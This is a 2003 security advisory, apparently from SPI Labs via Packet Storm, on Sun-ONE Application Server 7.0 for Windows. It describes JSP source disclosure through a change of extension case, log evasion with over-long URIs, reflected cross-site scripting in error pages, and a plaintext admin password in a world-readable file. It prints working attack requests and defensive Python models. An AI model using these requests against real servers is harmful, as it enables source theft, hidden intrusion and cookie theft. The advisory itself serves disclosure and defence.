sunone.txt

28 May 2003 | Reported by SPI Labs | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities were found in Sun-ONE Application Server 7.0 for Windows, including several information-exposure issues.

Code

Multiple Vulnerabilities in Sun-One Application Server
-------------------------------------------------------
  
[Release Date]: May 27, 2003  
  
[System Affected]  
* Sun-ONE Application Server 7.0 for Windows 2000/XP  
  
[Description]  
During a brief audit of a SunONE Application Server installation  
on Windows 2000, SPI Labs discovered a number of vulnerabilities.  
Each of the vulnerabilities is described in detail below. The complete  
advisory is also available from our website at:  
http://www.spidynamics.com/sunone_alert.html.  
  
Issue 1: JSP source code disclosure  
Severity: High  
-------------------------------------  
  
It is possible to view the source code of JSP applications by changing the case of the file extension in the HTTP request. The vulnerability is due to Unix code being ported to the Microsoft Windows platform, where the filesystem is case insensitive. When a request is received, the server performs a case sensitive check to determine whether the request ends in ".jsp". If it does, the JSP engine processes it. Otherwise, the server tries to retrieve the requested resource from the filesystem. On Unix operating systems this fails, because "file.jsp" cannot be opened by asking for "file.JSP". On Windows, however, the file is returned because the filesystem is case insensitive. Below is an example of a normal request/response, followed by the same request/response with the case change applied. The headers and response data have been trimmed for clarity.
  
[Original request]

```http
GET /hello.jsp HTTP/1.0
```

[Original response]

```http
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
</body></html>
```

[Request with case change]

```http
GET /hello.JSP HTTP/1.0
```

[Response with case change]

```http
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring day.
</body></html>
```
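The dispatch mismatch behind Issue 1, as an added model (not code from the advisory or from Sun): the flawed routine tests the extension case-sensitively and then falls back to a static file lookup, while the hardened one routes on the case-folded extension. The docroot listing and the `case_insensitive_fs` flag are constructed assumptions standing in for the Windows installation.

```python
# Added example (not code from the advisory or from Sun): a model of the
# dispatch logic described in Issue 1.  The server routes a request to the JSP
# engine only when the path ends in ".jsp" with exact case; anything else falls
# back to serving a file from the docroot.  On a case-insensitive filesystem
# "hello.JSP" matches hello.jsp on disk, so the raw source is served.  The
# hardened variant routes on the case-folded extension, so the engine (not the
# static file handler) always sees JSP files, whatever case the client used.

# Constructed docroot listing standing in for the server's docroot (assumption).
DOCROOT = {
    "hello.jsp": "<%= new java.util.Date().toString() %>",
    "logo.gif": "GIF89a...",
}
SOURCE_EXTS = {".jsp", ".jspx"}  # extensions whose bodies must never be served raw


def static_lookup(name, case_insensitive_fs):
    """Return what the filesystem would hand back for `name`, or None."""
    for stored, body in DOCROOT.items():
        if stored == name or (case_insensitive_fs and stored.lower() == name.lower()):
            return body
    return None


def flawed_dispatch(path, case_insensitive_fs):
    """The advisory's behaviour: case-sensitive extension test, then static fallback."""
    name = path.lstrip("/")
    if name.endswith(".jsp"):
        return "jsp-engine"
    body = static_lookup(name, case_insensitive_fs)
    return "static:" + body if body is not None else "404"


def hardened_dispatch(path, case_insensitive_fs):
    """Decide on the lower-cased extension so a case change cannot bypass the engine."""
    name = path.lstrip("/")
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext in SOURCE_EXTS:
        return "jsp-engine"  # the engine compiles the page or reports it missing
    body = static_lookup(name, case_insensitive_fs)
    return "static:" + body if body is not None else "404"
```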
  
  
Issue 2: Log evasion  
Severity: Medium  
-------------------------------------  
  
Only the first 4042 characters of a request URI are logged, even though the maximum URI length appears to be 4096 characters. This gives an attacker 54 characters to construct an attack with. Although it is possible that an administrator would still notice the unusual requests, he or she would be unable to determine what files or parameters the attacker would be requesting. Because of this, the administrator would not be able to find out what components of their system are being exploited. Below is an example request for /hello.jsp, as well as the log data. The headers, request and response data have been trimmed for clarity.
  
  
[Request for /hello.jsp]

```http
GET /AAAAAAAAAAAAAA[ up to 4042 characters]/../hello.jsp HTTP/1.0
```

[Console message]

```text
WARNING: HTTP4198: flex log buffer overflow- greater than 4096 characters
```

Server log file

```text
[04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow- greater than 4096 characters
```

Access log file

```text
172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /AAAAAAAAAA[ up to 4042 characters] ...
```

The name of the file that was accessed does not appear in the logs.
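Detection logic for Issue 2, as an added example that is not part of the advisory: an access-log entry cut at the 4042-character limit ends mid-URI with no HTTP version and no closing quote, and the server log carries the HTTP4198 warning, so both signals are checked. The log lines are constructed to match the formats shown above, not real captures.

```python
# Added example (not from the advisory): detection logic for Issue 2.  Because
# the server writes only the first 4042 characters of a URI, an access-log
# entry for an over-long request ends mid-URI, with no HTTP version and no
# closing quote, and the server log records an HTTP4198 warning.  Both signals
# are checked here over constructed sample lines (not real captures).
import re

LOG_URI_LIMIT = 4042  # URI characters written before the entry is cut (from the advisory)

# Constructed access-log lines: one truncated, one normal, one exactly at the limit.
ACCESS_LOG = [
    '172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /' + "A" * 4041,
    '172.16.10.47 - - [04/Mar/2003:10:53:11 -0800] "GET /hello.jsp HTTP/1.0" 200 173',
    '172.16.10.47 - - [04/Mar/2003:10:54:30 -0800] "GET /' + "B" * 4041 + ' HTTP/1.0" 404 0',
]
# Constructed server-log lines, one echoing the advisory's warning text.
SERVER_LOG = [
    "[04/Mar/2003:10:52:05] WARNING ( 1304): HTTP4198: flex log buffer overflow- greater than 4096 characters",
    "[04/Mar/2003:10:53:11] INFO ( 1304): request for /hello.jsp served",
]

# Common access-log prefix; `closed` is empty when the request field was cut off.
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)(?P<closed>"?)')


def truncated_requests(lines):
    """Return (ip, timestamp, reason) for entries whose request field is unreliable."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            hits.append(("?", "?", "unparseable line"))
            continue
        parts = m.group("req").split(" ")
        uri = parts[1] if len(parts) > 1 else ""
        if not m.group("closed") or len(parts) < 3:
            hits.append((m.group("ip"), m.group("ts"), "request field cut off: no HTTP version/closing quote"))
        elif len(uri) >= LOG_URI_LIMIT:
            hits.append((m.group("ip"), m.group("ts"), "URI at the 4042-character logging limit"))
    return hits


def overflow_warnings(lines):
    """HTTP4198 entries in the server log: the companion signal for a cut-off request."""
    return [line for line in lines if "HTTP4198" in line]
```

A request flagged by both functions at matching timestamps is one whose true target the access log cannot tell you; the server-side application log or a network capture is then the only record of what was requested.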
  
  
Issue 3: Cross site scripting  
Severity: Low  
-------------------------------------  
  
If an error occurs while processing a Java application, it may be possible to execute cross-site scripting attacks by placing scripted content in the query string. Below is an example of a request using a sample application, followed by the relevant portion of the response.
  
[Request]

```http
GET /webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script> HTTP/1.0
```

[Response snippet]

```html
Exception Report<br><br>
<b>Message: </b>Internal Server Error<br>
<p>
<b>Exception</b>
<pre>javax.servlet.ServletException: Invalid JSP file
<script>alert(document.cookie)</script>
at org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:471)
at _jasper._jsp._source_jsp._jspService(_source_jsp.java:88)
```
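The exception page from Issue 3 rebuilt as an added example (not the server's code), first as the advisory shows it, with the request-derived path copied in verbatim, and then with that value HTML-escaped before insertion. The template text and the sample path are constructed from the response above.

```python
# Added example (not the server's code): the exception page from Issue 3,
# first as the advisory shows it (the offending path copied in verbatim) and
# then with the untrusted value HTML-escaped.  Everything here is constructed.
import html

# The request path from the advisory's example, used as the sample input.
SAMPLE_PATH = "source.jsp?<script>alert(document.cookie)</script>"

# Constructed template matching the response snippet's layout.
TEMPLATE = (
    "Exception Report<br><br>\n"
    "<b>Message: </b>Internal Server Error<br>\n"
    "<p>\n<b>Exception</b>\n"
    "<pre>javax.servlet.ServletException: Invalid JSP file\n{path}\n</pre>"
)


def exception_report_vulnerable(jsp_path):
    """Mirrors the observed response: request-derived text goes straight into HTML."""
    return TEMPLATE.format(path=jsp_path)


def exception_report_hardened(jsp_path):
    """Same page, but the request-derived text is escaped before insertion."""
    return TEMPLATE.format(path=html.escape(jsp_path, quote=True))


def reflects_raw_tag(page, untrusted):
    """True when an untrusted string containing a tag appears in the page unescaped."""
    return "<" in untrusted and untrusted in page
```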
  
Issue 4: Incorrect local file permissions and plaintext passwords  
Severity: Medium  
-------------------------------------  
  
When installing SunONE on Windows 2000, the default installation directory is C:\sun. Any file or directory created in this directory will be world-readable. The "statefile" located at C:\sun\appserver7\statefile contains a plaintext username and password for the administrative server.
  
  
Remediation  
-------------------------------------  
  
Sun Microsystems was contacted on the 18th of March 2003 and again on numerous occasions without results. We hope that by publishing this information, the vendor will correct these problems. Unfortunately, there is no remediation procedure for the first, second or third issues. For the last issue, "Incorrect local file permissions and plaintext passwords", we recommend that the permissions of the statefile be changed so that only the administrator can access it.
  
[Contact Information]

[email protected]  
SPI Dynamics, Inc.  
115 Perimeter Center Place N.E.  
suite 270  
Atlanta, GA. 30346  
Toll-Free Phone: (866) 774-2700  
  
  
  
SPI Dynamics was founded in 2000 by a team of accomplished Web security specialists; SPI Dynamics is the leader in Web application security technology. With such signature products as WebInspect, SPI Dynamics is dedicated to protecting companies' most valuable assets. SPI Dynamics has created a new breed of Internet security products for the Web application, the most vulnerable yet least secure component of online business infrastructure.
  
Copyright (c) 2003 SPI Dynamics, Inc. All rights reserved worldwide.  
  
